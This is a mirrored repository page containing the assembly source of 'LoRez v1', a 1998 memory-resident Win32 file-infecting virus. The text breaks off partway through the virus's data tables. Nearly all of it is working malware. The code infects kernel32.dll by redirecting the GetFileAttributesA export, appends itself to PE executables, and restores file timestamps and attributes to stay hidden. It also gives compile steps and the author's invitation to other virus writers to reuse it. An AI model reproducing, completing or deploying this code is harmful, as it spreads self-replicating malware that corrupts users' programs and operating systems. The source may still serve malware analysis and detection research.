mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-19 01:46:09 +00:00
809 lines
32 KiB
NASM
809 lines
32 KiB
NASM
|
|
|||
|
;** NOTE: original release assumed that this virus worked on WinNT, but I
|
|||
|
;** never tested it. I later found out that it does not go memory resident
|
|||
|
;** under WinNT, although it causes no system faults, etc.
|
|||
|
|
|||
|
;
|
|||
|
; LoRez v1 - By Virogen [NoP]
|
|||
|
;
|
|||
|
; This is my final research on Win32 resident kernel infection. LoRez is
|
|||
|
; a memory-resident Win32 PE EXE Infector. It successfully operates on
|
|||
|
; any kernel version of any Win32 platform (Win95,WinNT,Win98). The virus
|
|||
|
; goes memory resident by infecting kernel32.dll. It changes the export
|
|||
|
; RVA of GetFileAttributesA to that of the virus code. The next time the
|
|||
|
; system boots, the virus goes memory resident and infects any PE EXE
|
|||
|
; win32 calls GetFileAttributesA on. This includes any EXE executed as well
|
|||
|
; as many those accessed in many other file manipulations. In order to
|
|||
|
; get around the shared lock on kernel32.dll, LoRez copies the kernel
|
|||
|
; to the windows directory and infects it there. This new copy of the
|
|||
|
; kernel will be found before the original one in the system directory
|
|||
|
; when the system is booted.
|
|||
|
;
|
|||
|
; In order to remove the use of static APIs addresses, LoRez searches
|
|||
|
; the kernel32 export table in memory for the APIs which it requires. It
|
|||
|
; does this by first determining the operating system. It finds this by
|
|||
|
; checking a value on the stack and comparing it to the Win95/98 or WinNT
|
|||
|
; kernel bases, which are static regardless of kernel version. If the
|
|||
|
; operating system cannot be determined, then LoRez passes control back
|
|||
|
; to the host without ever accessing any memory which might cause a fault.
|
|||
|
; Once the kernel base is determined, LoRez finds the export table and
|
|||
|
; then extracts the addresses of the APIs it needs.
|
|||
|
;
|
|||
|
; Virus Name: LoRez v1
|
|||
|
; Virus Author: Virogen [NoP]
|
|||
|
; Release Date: 03-05-98
|
|||
|
; Operating Systems: Win95/WinNT/Win98
|
|||
|
; Hosts : PE EXE files
|
|||
|
; Encryption: Removed, till I get a new poly engine coded
|
|||
|
; File Date/Time: Unchanged
|
|||
|
; File Attributes: Unchanged ; the virus resets and then restores them
|
|||
|
; File Size: Can grow by approx 1.6k at most. Sometimes there will be NO
|
|||
|
; file size increase due to the alignment of the EXE.
|
|||
|
;
|
|||
|
;
|
|||
|
; Past/Present/Future:
|
|||
|
; - My first Win95 virus was Yurn released last week. This was my first
|
|||
|
; attempt at windows resident infection and my first dive into the
|
|||
|
; windows operating system. Yurn infected the kernel by changing the
|
|||
|
; entry code of GetFileAttributesA to a call to the virus code. Yurn
|
|||
|
; was limited because it depended on static APIs and kernel versions
|
|||
|
; hardcoded into it. I regret releasing it in regards to the
|
|||
|
; superority of its spawn LoRez which was released only a week
|
|||
|
; later. However, the Yurn release helped me to acquire many new
|
|||
|
; insights from my virus colleagues. Release date: 02-25-98.
|
|||
|
;
|
|||
|
; - LoRez is my attempt at full Win32 infection without the use of
|
|||
|
; static APIs. LoRez is far superior to Yurn in many respects.
|
|||
|
; It has been a great success and I think will open up a new era of
|
|||
|
; Win32 infection. The techniques LoRez uses opens the Win32 platform
|
|||
|
; to many new possibilities. All that is left now is to add more
|
|||
|
; advanced features such as polymorphism and stealth. I sincerely hope
|
|||
|
; that virus authors will find this code useful in creating their own
|
|||
|
; kernel infectors. Release date: 03-05-98
|
|||
|
;
|
|||
|
; - The future: I will release a 32-bit polymorphic engine next,
|
|||
|
; along with a new and better virus using the techniques I've
|
|||
|
; researched here. This is ofcourse, provided I can finish it
|
|||
|
; before Mar 16 (I'll be gone from the computer world for 3
|
|||
|
; months). If not, then I look forward to seeing the new virus
|
|||
|
; code my colleagues have written in my absence.
|
|||
|
;
|
|||
|
; How to contact me : try effnet #virus
|
|||
|
;
|
|||
|
; Greetz -
|
|||
|
; -l, Memory Lapse, Soul Manager, Murkry, Treaz0n, Cicatrix, Darkman,
|
|||
|
; VirusBuster, and others.
|
|||
|
;
|
|||
|
;
|
|||
|
; HOW TO COMPILE LOREZ:
|
|||
|
; I use TASM32 v5. Included is a makefile for LOREZ. After you compile
|
|||
|
; the virus, just take out your handy hex editor and change the flags
|
|||
|
; of the code object to 0E0000040h. Note that this is stored in intel
|
|||
|
; reverse dd at offset 21Ch in LOREZ.EXE.
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
.386
|
|||
|
locals
|
|||
|
jumps
|
|||
|
.model flat,STDCALL
|
|||
|
|
|||
|
L equ
|
|||
|
|
|||
|
extrn ExitProcess : PROC ; this is so the import table
|
|||
|
; won't be empty. Is not used
|
|||
|
; in the virus. You'll need
|
|||
|
; IMPORT32.LIB for this one.
|
|||
|
|
|||
|
org 1000h
|
|||
|
.data ; our lonely data object
|
|||
|
progname db 'LoRez Virus host (c)Virogen',0
|
|||
|
.code ; .code - change flags after compile
|
|||
|
; to r/w/x
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
;
|
|||
|
start: ; the would-be host
|
|||
|
push 0
|
|||
|
call [ExitProcessAPI] ; exit process
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; LoRez virus starts here
|
|||
|
;
|
|||
|
MAX_HDR equ 0250h ; we shouldn't need more than this
|
|||
|
ID_OFF equ 0ch ; offset in header for our marker
|
|||
|
VIRUS_SIZE equ (offset vend-offset vstart) ; total size of our virus here
|
|||
|
VIRTUAL_SIZE equ (offset buffer_end-offset vstart) ; our virtual size
|
|||
|
MEM_ID equ 12345678h ; our communcation needs
|
|||
|
;
|
|||
|
;
|
|||
|
vstart:
|
|||
|
call geteip ; find relative offset
|
|||
|
geteip:
|
|||
|
mov ebp,[esp] ; grab it off stack
|
|||
|
mov eax,ebp ; used below
|
|||
|
sub ebp,offset geteip ; fix it up
|
|||
|
add esp,4 ; fix da stack
|
|||
|
|
|||
|
db 2dh ; sub eax
|
|||
|
host_addr dd (offset geteip-offset start)
|
|||
|
push eax ; subtract entry point differ
|
|||
|
; to get orginal entry VA
|
|||
|
|
|||
|
mov edx,[esp+4] ; determine OS
|
|||
|
and edx,0fff00000h
|
|||
|
mov eax,0BFF70000h ; WIn95 kernel base 0BFF70000
|
|||
|
cmp edx,0bff00000h ; Win95?
|
|||
|
jz good_os
|
|||
|
mov eax,edx ; our NT kernel at 77F00000
|
|||
|
cmp edx,077f00000h ; WinNT?
|
|||
|
jnz goto_host ; abort if neither
|
|||
|
|
|||
|
good_os:
|
|||
|
;
|
|||
|
; a brief explanation of the organization of the export table would be
|
|||
|
; useful here. Ok, basically there are three tables within the export
|
|||
|
; table : API RVA Table (32bit), Name Pointer Table(32bit), and Ordinal
|
|||
|
; Table (16bit). Ok, the ordinal number of an API is the entry number of
|
|||
|
; the API in the RVA array. So, multiply the ordinal number by four and
|
|||
|
; you've got an index into the API RVA Table. Probably you don't already
|
|||
|
; have the ordinal number though, so you'll have to find it. To do this,
|
|||
|
; you use the Name Pointer Table. This is an array of pointers to the
|
|||
|
; asciiz name of each API. When you find the pointer of the API you're
|
|||
|
; looking for by string compares, you take the index number of it and
|
|||
|
; multiply it by 2 (because the ordinal table is 16bit). Index the result
|
|||
|
; in the ordinal table, and you're all set.
|
|||
|
;
|
|||
|
;
|
|||
|
mov [ebp+imagebase],eax ; save kernel base
|
|||
|
mov esi,eax
|
|||
|
add esi,[esi+3ch] ; relative ptr to PE header
|
|||
|
cmp word ptr [esi],'EP' ; make sure we're on right track
|
|||
|
jnz goto_host ; if not.. abort
|
|||
|
mov esi,[esi+120] ; get export table RVA
|
|||
|
add esi,eax ; relative to image base
|
|||
|
mov edi,[esi+36] ; get ordinal table RVA
|
|||
|
add edi,eax ; relative to image base
|
|||
|
mov [ebp+ordinaltbl],edi ; save it
|
|||
|
mov edi,[esi+32] ; get name ptr RVA
|
|||
|
add edi,eax ; is relative to image base
|
|||
|
mov [ebp+nameptrtbl],edi ; save it
|
|||
|
mov ecx,[esi+24] ; get number of name ptrs
|
|||
|
mov esi,[esi+28] ; get address table RVA
|
|||
|
add esi,eax ; is relative to image base
|
|||
|
mov [ebp+adrtbl],esi ; save it
|
|||
|
|
|||
|
xor edx,edx ; edx is our ordinal counter
|
|||
|
; edi=name ptr table
|
|||
|
; ecx=number of name ptrs
|
|||
|
lea esi,[ebp+APIs] ; -> API Name ptrs
|
|||
|
mov [ebp+ourAPIptr],esi ; save it
|
|||
|
lea eax,[ebp+API_Struct] ; our API address will go here
|
|||
|
mov [ebp+curAPIptr],eax ; save it
|
|||
|
chk_next_API_name:
|
|||
|
mov esi,[ebp+ourAPIptr] ; get ptr to structure item
|
|||
|
mov ebx,[esi] ; load ptr to our API name
|
|||
|
add ebx,ebp ; add relative address
|
|||
|
mov esi,[edi] ; get API name RVA
|
|||
|
add esi,[ebp+imagebase] ; relative to image base
|
|||
|
compare_API_name:
|
|||
|
lodsb
|
|||
|
cmp al,byte ptr [ebx] ; compare a byte of names
|
|||
|
jnz not_our_API ; it's not our API
|
|||
|
cmp al,0 ; end of string?
|
|||
|
jz is_our_API ; it's our API
|
|||
|
inc ebx
|
|||
|
jmp compare_API_name
|
|||
|
|
|||
|
not_our_API:
|
|||
|
inc edx ; increment API counter
|
|||
|
cmp edx,ecx ; last entry of name ptr table?
|
|||
|
jz goto_host ; uhoh.. we didn't find one
|
|||
|
; of our APIs.. abort it all
|
|||
|
add edi,4 ; increment export name ptr idx
|
|||
|
mov esi,[ebp+ourAPIptr] ; restore our API name ptr struct
|
|||
|
jmp chk_next_API_name
|
|||
|
|
|||
|
is_our_API:
|
|||
|
|
|||
|
mov edi,[ebp+ordinaltbl] ; load oridinal table RVA
|
|||
|
push ecx
|
|||
|
push edx
|
|||
|
xchg edx,eax ; edx=API number
|
|||
|
add eax,eax ; *2 cuz ordinals are words
|
|||
|
add edi,eax ; add to ordinal table VA
|
|||
|
mov ax,[edi] ; get ordinal (word)
|
|||
|
xor edx,edx
|
|||
|
mov ecx,4
|
|||
|
mul ecx ; *4 cuz address tbl is dd's
|
|||
|
mov edi,[ebp+adrtbl] ; load address table VA
|
|||
|
add edi,eax ; set idx to API
|
|||
|
mov eax,edi
|
|||
|
sub eax,[ebp+imagebase] ; get the VA of the entry
|
|||
|
mov [ebp+originalRVAptr],eax ; save it for kernel infection
|
|||
|
; notice that our last API
|
|||
|
; in the array is the one we
|
|||
|
; hook
|
|||
|
mov eax,[edi] ; get API RVA
|
|||
|
mov [ebp+originalRVA],eax ; save it for kernel infection
|
|||
|
add eax,[ebp+imagebase] ; is relative to image base
|
|||
|
mov edi,[ebp+curAPIptr] ; idx to storage stucture
|
|||
|
mov [edi],eax ; save VA of API
|
|||
|
add edi,4 ; increment index
|
|||
|
mov [ebp+curAPIptr],edi ; save
|
|||
|
|
|||
|
pop edx
|
|||
|
pop ecx
|
|||
|
|
|||
|
mov edi,[ebp+nameptrtbl] ; reset export name ptr tableidx
|
|||
|
mov esi,[ebp+ourAPIptr] ; restore idx to our name ptrs
|
|||
|
add esi,4 ; increment idx API name ptr structure
|
|||
|
mov [ebp+ourAPIptr],esi ; save our new ptr to name ptr
|
|||
|
cmp dword ptr [esi],0 ; end of our API structure?
|
|||
|
jz found_all ; if so then we got 'em all
|
|||
|
mov edi,[ebp+nameptrtbl] ; reset idx to export name pt
|
|||
|
xor edx,edx ; reset API counter
|
|||
|
jmp chk_next_API_name
|
|||
|
|
|||
|
;
|
|||
|
; now we're done finding all of our API VAs
|
|||
|
;
|
|||
|
|
|||
|
found_all:
|
|||
|
|
|||
|
mov byte ptr [ebp+offset infkern],1 ; set kernel infection flag
|
|||
|
|
|||
|
lea eax,[ebp+fname]
|
|||
|
push eax ; save for below
|
|||
|
push 0FFh ; max buffer size
|
|||
|
push eax ; ptr
|
|||
|
call [ebp+GetSysDirAPI] ; get system directory
|
|||
|
|
|||
|
pop edi
|
|||
|
add edi,eax ; find end of directory name
|
|||
|
push edi ; where the filename needz to go
|
|||
|
|
|||
|
lea eax,[ebp+copyfname]
|
|||
|
push eax ; save for below
|
|||
|
push 0ffh
|
|||
|
push eax
|
|||
|
call [ebp+GetWinDirAPI] ; get windoze directory
|
|||
|
|
|||
|
pop edi
|
|||
|
add edi,eax
|
|||
|
|
|||
|
lea esi,[ebp+kernfile]
|
|||
|
call copy_str ; append \kernel32.dll to windoze dir
|
|||
|
|
|||
|
pop edi ; restore windoze sys dir
|
|||
|
lea esi,[ebp+kernfile]
|
|||
|
call copy_str ; append kernel32.dll to windoze sys dir
|
|||
|
|
|||
|
push 0
|
|||
|
lea eax,[ebp+copyfname] ; from sys dir
|
|||
|
push eax
|
|||
|
lea eax,[ebp+fname] ; to win dir
|
|||
|
push eax
|
|||
|
call [ebp+CopyFileAPI] ; copy kernel to windows dir
|
|||
|
|
|||
|
cmp eax,0 ; if error then we're prob.
|
|||
|
jz goto_host ; already in memory
|
|||
|
|
|||
|
lea eax,[ebp+copyfname] ; infecting windir\kernel32.dll
|
|||
|
mov [ebp+fnameptr],eax ; set file ptr
|
|||
|
|
|||
|
call infect_file ; infect the kernel
|
|||
|
|
|||
|
goto_host:
|
|||
|
|
|||
|
pop eax ; restore entry VA
|
|||
|
jmp eax ; jmp to host entry VA
|
|||
|
|
|||
|
;-----------------------------------------------
|
|||
|
; infect file - call with fnameptr set
|
|||
|
;
|
|||
|
infect_file:
|
|||
|
|
|||
|
mov eax,[ebp+fnameptr]
|
|||
|
push eax
|
|||
|
mov ecx,MEM_ID ; let us know its us
|
|||
|
call [ebp+GetAttribAPI] ; get file attributes
|
|||
|
mov [ebp+oldattrib],eax
|
|||
|
|
|||
|
cmp eax,-1 ; if error then maybe shared
|
|||
|
jnz not_shared
|
|||
|
ret ; can't infect it
|
|||
|
|
|||
|
not_shared:
|
|||
|
push 20h ; +A
|
|||
|
mov eax,[ebp+fnameptr]
|
|||
|
push eax
|
|||
|
call [ebp+SetAttribAPI] ; clear 'da attribs
|
|||
|
|
|||
|
call open_default_file
|
|||
|
|
|||
|
cmp eax,-1
|
|||
|
jnz open_ok
|
|||
|
ret
|
|||
|
|
|||
|
open_ok:
|
|||
|
|
|||
|
lea eax,[ebp+creation] ; creation time
|
|||
|
push eax
|
|||
|
lea eax,[ebp+lastaccess] ; last accessed
|
|||
|
push eax
|
|||
|
lea eax,[ebp+lastwrite] ; last writen to
|
|||
|
push eax
|
|||
|
push [ebp+handle]
|
|||
|
call [ebp+GetFileTimeAPI] ; grab the file time
|
|||
|
|
|||
|
mov ecx,50h ; read MZ EXE header
|
|||
|
lea edx,[ebp+peheader] ; (if that's what it is)
|
|||
|
call read_file
|
|||
|
|
|||
|
cmp word ptr [ebp+peheader],'ZM' ; is EXE?
|
|||
|
jnz abort_infect
|
|||
|
|
|||
|
mov eax,dword ptr [ebp+peheader+3ch] ; where PE hdr pointer is
|
|||
|
mov [ebp+ptrpeheader],eax ; save it
|
|||
|
call setfp
|
|||
|
|
|||
|
call setfp_pehdr
|
|||
|
|
|||
|
mov ecx,MAX_HDR ; now read the pe header
|
|||
|
lea edx,[ebp+peheader]
|
|||
|
call read_file
|
|||
|
|
|||
|
cmp [ebp+bytesread],MAX_HDR ; could we read it all?
|
|||
|
jnz abort_infect ; something funky if no
|
|||
|
|
|||
|
cmp word ptr [ebp+peheader],'EP' ; PE?
|
|||
|
jnz abort_infect
|
|||
|
cmp dword ptr [ebp+peheader+ID_OFF],0 ; any value here?
|
|||
|
jnz abort_infect ; if yes, infected
|
|||
|
cmp byte ptr [ebp+infkern],1 ; infecting kernel?
|
|||
|
jz skip_base_chk ; if so then its ok to be DLL
|
|||
|
cmp dword ptr [ebp+imagebase],00400000h ; executables should have this
|
|||
|
jnz abort_infect ; base, DLLs probably not.
|
|||
|
skip_base_chk:
|
|||
|
|
|||
|
call [ebp+GetTickCountAPI] ; get tick count
|
|||
|
mov dword ptr [ebp+peheader+ID_OFF],eax ; save as infect flag
|
|||
|
|
|||
|
xor esi,esi
|
|||
|
mov si, word ptr [ebp+NtHeaderSize] ; get header size
|
|||
|
add esi,18h ; object table is here
|
|||
|
mov dword ptr [ebp+ObjTbloff],esi
|
|||
|
|
|||
|
lea eax,[ebp+peheader] ; is relative to PE hdr RVA
|
|||
|
add esi,eax ; esi->object table
|
|||
|
mov [ebp+objtblVA],esi ; save the object table VA
|
|||
|
xor eax,eax
|
|||
|
mov ax,[ebp+numObj] ; get number of objects
|
|||
|
dec eax ; we want last object
|
|||
|
mov ecx,40 ; each object 40 bytes
|
|||
|
xor edx,edx
|
|||
|
mul ecx ; numObj-1*40=last object
|
|||
|
add esi,eax ; esi->last obj
|
|||
|
|
|||
|
lea eax,[ebp+peheader+MAX_HDR-40]
|
|||
|
cmp esi,eax ; if it's out of our range
|
|||
|
jg abort_infect ; then about this here shit
|
|||
|
|
|||
|
mov eax,[esi+20] ; get last object physical off
|
|||
|
mov [ebp+lastobjimageoff],eax ; save it
|
|||
|
|
|||
|
mov ecx,dword ptr [ebp+filealign] ; get file alignment
|
|||
|
mov eax,[esi+16] ; get physical size of object
|
|||
|
mov [ebp+originalpsize],eax ; save it 4 later
|
|||
|
push eax
|
|||
|
add eax,vend-vstart ; size of our code
|
|||
|
call align_fix ; set on file alignment
|
|||
|
mov dword ptr [esi+16],eax ; save new physical size
|
|||
|
|
|||
|
mov ecx,dword ptr [ebp+objalign] ; get object alignment
|
|||
|
push ecx ; save for below
|
|||
|
mov eax,[esi+8] ; get object virtual size
|
|||
|
add eax,VIRTUAL_SIZE ; add our virtual size
|
|||
|
call align_fix ; set on obj alignment
|
|||
|
mov dword ptr [esi+8],eax ; save new virtual size
|
|||
|
|
|||
|
pop ecx
|
|||
|
mov eax,VIRTUAL_SIZE ; how big we is
|
|||
|
add eax,dword ptr [ebp+imagesize] ; add to old image size
|
|||
|
call align_fix ; set on obj alignment
|
|||
|
mov dword ptr [ebp+imagesize],eax ; save new imagesize
|
|||
|
|
|||
|
mov [esi+36],0E0000040h ; set object flags r/x/x
|
|||
|
|
|||
|
pop eax ; restore orginal physical size
|
|||
|
add eax,[esi+12] ; add last object's RVA
|
|||
|
; eax now RVA of virus code
|
|||
|
mov [ebp+virusRVA],eax ; save it
|
|||
|
cmp byte ptr [ebp+offset infkern],0 ; do our kernel32?
|
|||
|
jz new_entry ; nope.. regular PE
|
|||
|
|
|||
|
;--- our kernel infection starts here ---
|
|||
|
;
|
|||
|
; This is really fairly simple. First thing we need to do is find the
|
|||
|
; image offset of the export table entry for the API we're hooking. We
|
|||
|
; do this by locating the object that contains the export table. Then,
|
|||
|
; we subtract the image offset of the object from the virtual offset
|
|||
|
; of the object. The difference is then subtracted from the previously
|
|||
|
; saved RVA of the table entry. =image offset
|
|||
|
;
|
|||
|
; The different Win32 kernels have different objects which their
|
|||
|
; export table is located in. The Win95 kernels have it located in
|
|||
|
; .edata, while win98 puts it in .text, winNT decides to throw the
|
|||
|
; shit in .rdata. How do we determine which kernel is which, and which
|
|||
|
; object to calculate the image offset by? Simple, Win95 is the only
|
|||
|
; kernel that contains .edata, WinNT is the only kernel which contains
|
|||
|
; .rdata, and Win98 is the only kernel which doesn't contain either.
|
|||
|
;
|
|||
|
; Once we extrapolate the image offset of the export table entry for the
|
|||
|
; RVA of the API we're hooking, we just save the old RVA, and put our
|
|||
|
; RVA in its place.
|
|||
|
;
|
|||
|
;
|
|||
|
mov esi,[ebp+objtblVA] ; load object table VA
|
|||
|
xor ecx,ecx
|
|||
|
mov cx,[ebp+numObj] ; get number of objects
|
|||
|
dec ecx
|
|||
|
xor edx,edx ; we'll store our virtual-
|
|||
|
; physical difference here
|
|||
|
calc_fo_loop:
|
|||
|
cmp dword ptr [esi],'ade.' ; is it .edata? for win95
|
|||
|
jz end_calc_fo_loop ; if so we can reference it
|
|||
|
cmp dword ptr [esi],'xet.' ; is it .text? for win98
|
|||
|
jnz not_text
|
|||
|
mov [ebp+objtext],esi ; save table entry offset
|
|||
|
not_text:
|
|||
|
cmp dword ptr [esi],'adr.' ; is it .rdata? for winNT
|
|||
|
jz end_calc_fo_loop ; if rdata exists, then
|
|||
|
; our export shit is there
|
|||
|
add esi,40 ; to next object we go
|
|||
|
dec ecx ; decrement # of objects
|
|||
|
jnz calc_fo_loop ; if not been thru all loop
|
|||
|
mov esi,[ebp+objtext] ; if .edata or .rdata, then
|
|||
|
end_calc_fo_loop: ; it must be .text
|
|||
|
mov edx,[esi+12] ; get the object virtual off
|
|||
|
sub edx,[esi+20] ; subtract physical offset
|
|||
|
mov eax,[ebp+originalRVAptr] ; get table entry rva
|
|||
|
sub eax,edx ; subract difference
|
|||
|
|
|||
|
mov [ebp+FileOff],eax ; save table entry image off
|
|||
|
call setfp ; set file pointer to it
|
|||
|
|
|||
|
mov ecx,4 ; read RVA
|
|||
|
lea edx,[ebp+chkRVA]
|
|||
|
call read_file ; and check it to make sure
|
|||
|
; we've got it right
|
|||
|
mov eax,[ebp+chkRVA]
|
|||
|
cmp eax,[ebp+originalRVA] ; is it the right RVA?
|
|||
|
jnz abort_infect ; if not abort infection
|
|||
|
|
|||
|
mov eax,[ebp+FileOff] ; get image offset
|
|||
|
call setfp ; set file ptr to table entry
|
|||
|
|
|||
|
mov eax,[ebp+virusRVA] ; get virus RVA
|
|||
|
add eax,(offset hook-offset vstart) ; find our API hook RVA
|
|||
|
|
|||
|
lea esi,[ebp+hookRVA] ; to be written
|
|||
|
mov [esi],eax ; save hook RVA
|
|||
|
mov ecx,4 ; dd
|
|||
|
call write_code ; write the new hook RVA
|
|||
|
|
|||
|
mov eax,[ebp+originalRVA] ; get orginal API RVA
|
|||
|
add eax,[ebp+imagebase] ; relative to image base
|
|||
|
mov [ebp+jmpback],eax ; save it
|
|||
|
|
|||
|
jmp calc_reloc ; skip entry point change..
|
|||
|
|
|||
|
;-------------------------------------------------------
|
|||
|
; our PE EXE infection
|
|||
|
;
|
|||
|
new_entry:
|
|||
|
mov eax,[ebp+virusRVA] ; eax=virus RVA
|
|||
|
mov ebx,dword ptr [ebp+entrypointRVA] ; save old entry point
|
|||
|
mov dword ptr [ebp+entrypointRVA],eax ; put our RVA as entry
|
|||
|
|
|||
|
calc_reloc:
|
|||
|
add eax,(offset geteip-offset vstart) ; fix for our reloc call
|
|||
|
sub eax,ebx ; difference of entry pts
|
|||
|
mov dword ptr [ebp+offset host_addr],eax ; virusRVA-entryRVA=diff
|
|||
|
; virusVA-diff=entryVA
|
|||
|
|
|||
|
call setfp_pehdr ; back to PE header
|
|||
|
|
|||
|
lea esi,[ebp+peheader] ; write the new PE header
|
|||
|
mov ecx,MAX_HDR
|
|||
|
call write_code ; to the host
|
|||
|
|
|||
|
mov eax,[ebp+originalpsize] ; restore original physical size
|
|||
|
add eax,[ebp+lastobjimageoff] ; add object physical offset
|
|||
|
call setfp ; set ptr to end of object
|
|||
|
|
|||
|
lea esi,[ebp+vstart]
|
|||
|
mov ecx,VIRUS_SIZE
|
|||
|
call write_code ; write the virus code to the host
|
|||
|
|
|||
|
abort_infect:
|
|||
|
|
|||
|
lea eax,[ebp+creation] ; creation time
|
|||
|
push eax
|
|||
|
lea eax,[ebp+lastaccess] ; last accessed
|
|||
|
push eax
|
|||
|
lea eax,[ebp+lastwrite] ; last writen to
|
|||
|
push eax
|
|||
|
push [ebp+handle]
|
|||
|
call [ebp+SetFileTimeAPI] ; restore orginal file time
|
|||
|
|
|||
|
call close_file ; we're done
|
|||
|
|
|||
|
mov eax,[ebp+oldattrib] ; get original attribs
|
|||
|
push eax
|
|||
|
mov eax,[ebp+fnameptr]
|
|||
|
push eax
|
|||
|
call [ebp+SetAttribAPI] ; restore the original attributes
|
|||
|
ret
|
|||
|
|
|||
|
;---------------------------------------------------------------
|
|||
|
; close handle at [handle]
|
|||
|
;
|
|||
|
close_file:
|
|||
|
push dword ptr [ebp+offset handle]
|
|||
|
call [ebp+CloseFileAPI]
|
|||
|
ret
|
|||
|
|
|||
|
;---------------------------------------------------------------
|
|||
|
; opens file with ptr to filename at [fnameptr]
|
|||
|
;
|
|||
|
open_default_file:
|
|||
|
mov eax,[ebp+fnameptr]
|
|||
|
;---------------------------------------------------------------
|
|||
|
; opens file, pass eax->filename
|
|||
|
;
|
|||
|
open_file:
|
|||
|
push 0
|
|||
|
push 20h ; r+w
|
|||
|
push 3 ; 3=open existing file
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push 0C0000000h ; open for r+w
|
|||
|
push eax
|
|||
|
call [ebp+CreateFileAPI]
|
|||
|
mov [ebp+handle],eax ; save handle
|
|||
|
ret
|
|||
|
|
|||
|
;---------------------------------------------------------------
|
|||
|
; read handle
|
|||
|
; pass ecx=bytes to read, edx=offset for bytes read
|
|||
|
;
|
|||
|
read_file:
|
|||
|
push 0
|
|||
|
lea eax,[ebp+bytesread]
|
|||
|
push eax
|
|||
|
push ecx
|
|||
|
push edx
|
|||
|
push [ebp+handle]
|
|||
|
call [ebp+ReadFileAPI]
|
|||
|
ret
|
|||
|
|
|||
|
;--------------------------------------------------------------
|
|||
|
; sets eax on alignment of ecx
|
|||
|
;
|
|||
|
align_fix:
|
|||
|
xor edx,edx
|
|||
|
div ecx ; /alignment
|
|||
|
inc eax ; next alignment
|
|||
|
mul ecx ; *alignment
|
|||
|
ret
|
|||
|
|
|||
|
;--------------------------------------------------------------
|
|||
|
; set file pointer to PE header
|
|||
|
setfp_pehdr:
|
|||
|
mov eax,[ebp+ptrpeheader]
|
|||
|
|
|||
|
;--------------------------------------------------------------
|
|||
|
; set file ptr of [handle]
|
|||
|
; pass eax=offset from beginning
|
|||
|
;
|
|||
|
setfp:
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push eax
|
|||
|
push [ebp+handle]
|
|||
|
call [ebp+SetFilePtrAPI]
|
|||
|
ret
|
|||
|
|
|||
|
;-------------------------------------------------------------
|
|||
|
; write to [handle]
|
|||
|
; pass ecx=bytes to write, esi->source
|
|||
|
;
|
|||
|
write_code:
|
|||
|
push 0
|
|||
|
lea eax,[ebp+bytesread]
|
|||
|
push eax
|
|||
|
push ecx
|
|||
|
push esi
|
|||
|
push [ebp+handle]
|
|||
|
call [ebp+WriteFileAPI]
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;-------------------------------------------------------------
|
|||
|
; copy string
|
|||
|
; pass edi->destination esi->source
|
|||
|
;
|
|||
|
|
|||
|
copy_str:
|
|||
|
mov ecx,0FFh ; no bigger than 256
|
|||
|
copystr:
|
|||
|
lodsb
|
|||
|
stosb
|
|||
|
cmp al,0
|
|||
|
jz copystrdone
|
|||
|
loop copystr
|
|||
|
copystrdone:
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;------------------------------ hooked ------------------------
|
|||
|
; this is our API hook for GetAttrib
|
|||
|
;
|
|||
|
hook:
|
|||
|
|
|||
|
pushfd
|
|||
|
push eax ; save regs
|
|||
|
push ebx
|
|||
|
push ecx
|
|||
|
push edx
|
|||
|
push edi
|
|||
|
push esi
|
|||
|
push ebp
|
|||
|
|
|||
|
call reloc ; find relative index
|
|||
|
reloc:
|
|||
|
pop ebp ; eip
|
|||
|
sub ebp, offset reloc ; get relative address
|
|||
|
|
|||
|
lea eax,[ebp+jmpback] ; get jump back ptr
|
|||
|
mov [ebp+jmpbackptr],eax ; save jump back ptr
|
|||
|
|
|||
|
cmp ecx,MEM_ID ; is it us?
|
|||
|
jz abort_mem ; if so then abort
|
|||
|
|
|||
|
mov byte ptr [ebp+infkern],0 ; we're infecting normal
|
|||
|
|
|||
|
mov eax,[esp+24h] ; ptr to filename is here
|
|||
|
mov [ebp+fnameptr],eax ; save ptr to filename
|
|||
|
call infect_file ; replicate ourselves
|
|||
|
abort_mem:
|
|||
|
pop ebp ; restore regs
|
|||
|
pop esi
|
|||
|
pop edi
|
|||
|
pop edx
|
|||
|
pop ecx
|
|||
|
pop ebx
|
|||
|
pop eax
|
|||
|
popfd
|
|||
|
|
|||
|
db 0FFh,25h ; jmp [ ]
|
|||
|
jmpbackptr dd offset jmpback
|
|||
|
|
|||
|
jmpback dd 0 ; original API VA
|
|||
|
|
|||
|
db '<27> [LoRez] v1 by Virogen [NoP] <20>' ; it's i said the fly
|
|||
|
|
|||
|
kernfile db '\KERNEL32.dll',0 ; our kernel filename
|
|||
|
kernfile_e:
|
|||
|
|
|||
|
APIs: ; structure of ptrs to our API names
|
|||
|
dd offset GetTicks
|
|||
|
dd offset GetWinDir
|
|||
|
dd offset SetAttrib
|
|||
|
dd offset CreateFile
|
|||
|
dd offset SetFilePtr
|
|||
|
dd offset ReadFile
|
|||
|
dd offset WriteFile
|
|||
|
dd offset CloseFile
|
|||
|
dd offset GetSysDir
|
|||
|
dd offset CopyFile
|
|||
|
dd offset GetFileTime
|
|||
|
dd offset SetFileTime
|
|||
|
dd offset ExitProc
|
|||
|
dd offset GetAttrib ; the last entry is our hooked API
|
|||
|
dd 0
|
|||
|
; our API names
|
|||
|
GetTicks db 'GetTickCount',0
|
|||
|
GetWinDir db 'GetWindowsDirectoryA',0
|
|||
|
SetAttrib db 'SetFileAttributesA',0
|
|||
|
CreateFile db 'CreateFileA',0
|
|||
|
SetFilePtr db 'SetFilePointer',0
|
|||
|
ReadFile db 'ReadFile',0
|
|||
|
WriteFile db 'WriteFile',0
|
|||
|
CloseFile db 'CloseHandle',0
|
|||
|
GetSysDir db 'GetSystemDirectoryA',0
|
|||
|
CopyFile db 'CopyFileA',0
|
|||
|
GetFileTime db 'GetFileTime',0
|
|||
|
SetFileTime db 'SetFileTime',0
|
|||
|
ExitProc db 'ExitProcess',0 ; only used in original host
|
|||
|
GetAttrib db 'GetFileAttributesA',0
|
|||
|
|
|||
|
API_Struct: ; structure for API VAs
|
|||
|
GetTickCountAPI dd 0
|
|||
|
GetWinDirAPI dd 0
|
|||
|
